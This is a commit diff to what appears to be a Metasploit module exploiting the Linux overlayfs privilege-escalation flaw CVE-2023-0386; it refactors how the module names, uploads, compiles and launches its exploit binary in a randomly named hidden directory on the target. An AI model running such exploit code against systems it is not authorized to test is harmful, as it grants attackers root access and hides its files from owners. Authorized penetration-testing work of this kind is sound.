Use exploit_path variable

Takahiro-Yoko · Takahiro-Yoko · commit 9e832eb483ab · 2024-09-07T09:19:17.000+09:00
diff --git a/modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb b/modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb
@@ -111,16 +111,17 @@ def exploit
 
     # Upload exploit executable
     exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+    exploit_path = "#{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
 
     mkdir(exploit_dir)
     register_dir_for_cleanup(exploit_dir)
 
     if live_compile?
       vprint_status('Live compiling exploit on system...')
-      upload_and_compile("#{exploit_dir}/cve-2023-0386", strip_comments(exploit_source('CVE-2023-0386', 'exploit.c')), '-D_FILE_OFFSET_BITS=64 -lfuse -ldl -pthread')
+      upload_and_compile("#{exploit_path}", strip_comments(exploit_source('CVE-2023-0386', 'exploit.c')), '-D_FILE_OFFSET_BITS=64 -lfuse -ldl -pthread')
     else
       vprint_status('Dropping pre-compiled exploit on system...')
-      upload_and_chmodx("#{exploit_dir}/cve-2023-0386", exploit_data('CVE-2023-0386', 'cve-2023-0386'))
+      upload_and_chmodx("#{exploit_path}", exploit_data('CVE-2023-0386', 'cve-2023-0386'))
     end
 
     # Upload payload executable
@@ -131,7 +132,7 @@ def exploit
 
     # Launch exploit
     print_status('Launching exploit...')
-    cmd_string = "#{exploit_dir}/cve-2023-0386 #{payload_path} #{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
+    cmd_string = "#{exploit_path} #{payload_path} #{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
     vprint_status("Running: #{cmd_string}")
     begin
       output = cmd_exec(cmd_string, nil, datastore['TIMEOUT'])
